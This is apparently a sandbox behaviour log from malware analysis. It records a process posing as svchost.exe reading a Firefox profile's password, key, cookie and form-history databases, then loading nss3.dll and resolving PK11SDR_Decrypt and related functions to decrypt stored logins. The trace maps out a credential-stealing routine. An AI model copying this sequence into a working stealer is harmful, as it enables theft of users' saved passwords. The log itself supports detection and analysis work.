| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Add Search Path | filename = C:\Program Files (x86)\Mozilla Firefox |
|
1 | |
| Module | Load | module_name = nss3.dll, base_address = 0x74490000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = NSS_Init, address_out = 0x7454d70b |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = NSS_Shutdown, address_out = 0x7454d13c |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SECITEM_FreeItem, address_out = 0x7454e656 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = PK11_GetInternalKeySlot, address_out = 0x744e3c51 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = PK11_Authenticate, address_out = 0x744cd3ca |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = PK11SDR_Decrypt, address_out = 0x744e00a7 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = PK11_FreeSlot, address_out = 0x744e3333 |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, type = size |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, size = 4096, size_out = 4096 |
|
80 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, size = 4096, size_out = 0 |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
